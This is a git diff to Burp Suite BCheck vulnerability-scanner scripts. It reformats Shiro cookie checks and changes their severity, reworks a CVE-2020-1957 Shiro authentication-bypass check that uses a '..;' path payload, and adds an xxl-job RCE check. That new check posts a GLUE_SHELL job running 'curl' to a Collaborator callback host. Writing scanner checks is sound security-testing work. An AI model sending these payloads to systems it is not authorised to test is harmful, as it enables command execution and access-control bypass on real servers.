diff --git a/other/shiro/shiro_active.bcheck b/other/shiro/shiro_active.bcheck
index 39798ec..4c777bf 100644
--- a/other/shiro/shiro_active.bcheck
+++ b/other/shiro/shiro_active.bcheck
@@ -1,9 +1,9 @@
 metadata:
-  language: v1-beta
-  name: "Shiro Cookie Check Active"
-  description: "Detects Shiro Vulnerability by Manipulating Cookie"
-  author: "timeshatter"
-  tags: "Shiro,active"
+    language: v1-beta
+    name: "Shiro Cookie Check Active"
+    description: "Detects Shiro Vulnerability by Manipulating Cookie"
+    author: "timeshatter"
+    tags: "Shiro,active"
 
 define:
     shiroExploit = "rememberMe=1"
@@ -17,8 +17,9 @@ given request then
     
     if "rememberMe=deleteMe" in {check.response} then
         report issue:
-            severity: high
-            confidence: firm
+            severity: info
+            confidence: certain
             detail: {issueDetail}
             remediation: {issueRemediation}
     end if
+    
\ No newline at end of file
diff --git a/other/shiro/shiro_passive.bcheck b/other/shiro/shiro_passive.bcheck
index 8b251d9..37a2ae5 100644
--- a/other/shiro/shiro_passive.bcheck
+++ b/other/shiro/shiro_passive.bcheck
@@ -1,15 +1,15 @@
 metadata:
-  language: v1-beta
-  name: "Shiro Cookie Check Passive"
-  description: "Check for Shiro Vulnerability in Response"
-  author: "timeshatter"
-  tags: "Shiro,passive"
+    language: v1-beta
+    name: "Shiro Cookie Check Passive"
+    description: "Check for Shiro Vulnerability in Response"
+    author: "timeshatter"
+    tags: "Shiro,passive"
 
 given response then
     if "rememberMe=deleteMe" in {latest.response} then
         report issue:
-            severity: high
-            confidence: firm
+            severity: info
+            confidence: certain
             detail: "Shiro Vulnerability Detected: rememberMe=deleteMe"
             remediation: "Investigate and fix the Shiro vulnerability immediately."
     end if
diff --git a/other/xxl-job/xxl_job_rce.bcheck b/other/xxl-job/xxl_job_rce.bcheck
new file mode 100644
index 0000000..d928b93
--- /dev/null
+++ b/other/xxl-job/xxl_job_rce.bcheck
@@ -0,0 +1,25 @@
+metadata:
+    language: v1-beta
+    name: "xxl job rce"
+    description: "xxl job rce detection"
+    author: "timeshatter"
+    tags: "xxl job"
+
+define:
+    poc = `\{"jobId": 66666666,"executorHandler": "demoJobHandler","executorParams":"demoJobHandler","executorBlockStrategy": "COVER_EARLY","executorTimeout": 0, "logId": 1,"logDateTime": 1586629003729,"glueType": "GLUE_SHELL","glueSource": "curl {generate_collaborator_address()}","glueUpdatetime": 1586699003758,"broadcastIndex": 0,"broadcastTotal": 0}`
+
+given host then
+    send request:
+        method: "POST"
+        path: "/run"
+        headers:
+            "Content-Type": "application/json"
+        body: {poc}
+
+    if any interactions then
+        report issue:
+            severity: high
+            confidence: certain
+            detail: "xxl job rce detection."
+            remediation: "Turn on the authentication component that comes with XXL-JOB."
+    end if
diff --git a/vulnerabilities-CVEd/CVE-2020-1957-shiro_auth_bypass.bcheck b/vulnerabilities-CVEd/CVE-2020-1957-shiro_auth_bypass.bcheck
index 7ebc312..f6718f7 100644
--- a/vulnerabilities-CVEd/CVE-2020-1957-shiro_auth_bypass.bcheck
+++ b/vulnerabilities-CVEd/CVE-2020-1957-shiro_auth_bypass.bcheck
@@ -1,24 +1,26 @@
 metadata:
-  language: v1-beta
-  name: "CVE-2020-1957 Shiro AuthBypass"
-  description: "AuthBypass CVE-2020-1957"
-  author: "timeshatter"
-  tags: "Shiro", "AuthBypass CVE-2020-1957", "active"
+    language: v1-beta
+    name: "CVE-2020-1957 Shiro AuthBypass"
+    description: "AuthBypass CVE-2020-1957"
+    author: "timeshatter"
+    tags: "Shiro", "AuthBypass CVE-2020-1957", "active"
 
 given request then
-  send request called check:
-    replacing headers:
-      "Cookie": "rememberMe=1"
+    if not ({base.response.status_code} is  "200") then
+        send request called check:
+            replacing headers:
+             "Cookie": "rememberMe=1"
 
-    if "rememberMe=deleteMe" in {check.response} then
-      send request called auth_pass_check:
-        replacing path: `/xxx/..;{base.request.url.path}`
+        if "rememberMe=deleteMe" in {check.response} then
+            send request called auth_pass_check:
+            replacing path: `/xxx/..;{base.request.url.path}`
 
-        if (not ({check.response.status_code} is  "200")) and {auth_pass_check.response.status_code} is "200" then
-            report issue:
-               severity: high
-               confidence: certain
-               detail: "find shiro AuthBypass CVE-2020-1957"
-               remediation: "update shiro to last."
+            if {auth_pass_check.response.status_code} is "200" then
+                 report issue:
+                     severity: high
+                     confidence: certain
+                     detail: "find shiro AuthBypass CVE-2020-1957"
+                     remediation: "update shiro to last."
+             end if
         end if
-    end if
+    end if
\ No newline at end of file